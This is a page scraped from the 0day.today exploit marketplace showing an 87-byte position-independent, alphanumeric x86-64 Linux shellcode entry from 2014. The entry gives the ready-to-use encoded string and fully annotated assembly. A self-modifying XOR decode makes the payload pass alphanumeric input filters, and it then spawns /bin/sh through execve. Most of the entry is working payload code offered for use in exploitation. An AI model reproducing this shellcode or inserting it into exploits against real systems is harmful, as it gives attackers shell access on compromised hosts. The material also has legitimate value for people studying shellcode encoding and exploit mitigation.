[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); - 87 Byte

Author
Breaking.Technology
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22849
Category
shellcode
Date add
10-11-2014
Platform
linux
#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt
 
#    Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
#                        (c) 2014 Breaking Technology, Inc.                       
#                           http://breaking.technology/                           
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o
.section .data
.section .text
.globl _start
 
_start:                     # "XX"
  pop %rax                  # 'X' add $0x8, %rsp  ; so we dont overwrite the return pointer
  pop %rax                  # 'X' add $0x8, %rsp  ; so we dont overwrite the return pointer
 
prepare_ff:                 # "j0TYX45Pk13"
  push $0x30                # 'j0'
  push %rsp                 # 'T'
  pop %rcx                  # 'Y'   %rcx points to $0x30
  pop %rax                  # 'X'   %rax   = 0x30
  xor $0x35, %al            # '45'  %rax   = 0x05
  push %rax                 # 'P'   (%rcx) = 0x05
  imul $0x33, (%rcx), %esi  # 'k13' %esi = 0x000000ff
 
prepare_f8:                 # "VX4047"
  # mov %rsi, %rax
  push %rsi                 # 'V' 
  pop %rax                  # 'X'    %rax = %rsi = 0x000000ff
 
  # mov $0xf8, %al
  xor $0x30, %al            # '40'
  xor $0x37, %al            # '47'   %rax = 0x000000f8
 
write_negative_8:           # "3At1At1qu1qv1qw"
  # mov %eax, 0x74(%rcx)
  xor 0x74(%rcx), %eax      # '3At'
  xor %eax, 0x74(%rcx)      # '1At' 0xf8
 
  # mov %sil, 0x75 - 0x77 + rcx
  xor %esi, 0x75(%rcx)      # '1qu' 0xff
  xor %esi, 0x76(%rcx)      # '1qv' 0xff
  xor %esi, 0x77(%rcx)      # '1qw' 0xff
 
  # -8 is now on the stack as a 32-bit dword
  # at 0x74(%rcx)
 
read_negative_8:            # "Hcyt"
  # move long (dword) to signed quadword
  # mov -8, %rdi
  movslq 0x74(%rcx), %rdi   # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )
 
get_return_pointer:         # "14yH34y"
  # mov -0x10(%rcx), %rsi   <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
  # OR IN DECIMAL:
  # mov -16(%rcx), %rsi
  xor %esi, (%rcx, %rdi, 2) # '14y'
  xor (%rcx, %rdi, 2), %rsi # 'H34y'
 
prepare_key:                # "hj5XVX"
  # put the xor key into %eax
  push $0x5658356a          # 'hj5XV' pushed backwards because x86 stack.
  pop %rax                  # 'X'
 
decode_encoded_code:        # "1FK"
  xor %eax, 0x4b(%rsi)      # '1FK'  encoded_code       ; pops & syscall decoded
 
decode_encoded_data:        # "1FSH3FO"
  xor %eax, 0x53(%rsi)      # '1FS'  encoded_data + 4  ; "/sh\0" decoded
  xor 0x4f(%rsi), %rax      # 'H3FO' encoded_data      ; "/bin/sh\0" now in %rax
 
begin_stack_setup:          # "PT"
  push %rax                 # 'P' push "/bin/sh\0"
  push %rsp                 # 'T' push pointer to /bin/sh
   
 
zero_rax:                   # "j0X40"
  # xor %rax, %rax
  push $0x30                # 'j0'
  pop %rax                  # 'X'
  xor $0x30, %al            # '40' %rax is NULL
 
end_stack_setup:            # "PP"
  push %rax                 # 'P' push NULL
  push %rax                 # 'P' push NULL
 
 
mov_3b_al:                  # "4u4N"
  # mov $0x3b, %al
  xor $0x75, %al            # '4u'
  xor $0x4e, %al            # '4N' %al = 0x4e xor 0x75 =  $0x3b
                            #            this is for syscall ^
begin_stack_run:            # "Z"
  pop %rdx                  # 'Z' mov $0x00, %rdx ; %rdx = NULL
 
 
encoded_code:               # "4jWS"
                            #  0x34 0x6a 0x57 0x53
                            # AFTER XOR MAGIC:
  .byte 0x34                # "\x5e" pop %rsi     ; %rsi = NULL
  .byte 0x6a                # "\x5f" pop %rdi     ; %rdi = pointer to "/bin/sh\0"
  .byte 0x57                # "\x0f"
  .byte 0x53                # "\x05" syscall      ; execve("/bin/sh\0",NULL,NULL);
 
  # syscall(%rax) = function(%rdi,%rsi,%rdx);
  # syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
 
 
encoded_data:               # "EW18EF0V" turns into "/bin/sh\0"
                            # 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
                            # AFTER XOR MAGIC:
  .byte 0x45                #  /
  .byte 0x57                #  b
  .byte 0x31                #  i
  .byte 0x38                #  n
  .byte 0x45                #  /
  .byte 0x46                #  s
  .byte 0x30                #  h
  .byte 0x56                #  \0

#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team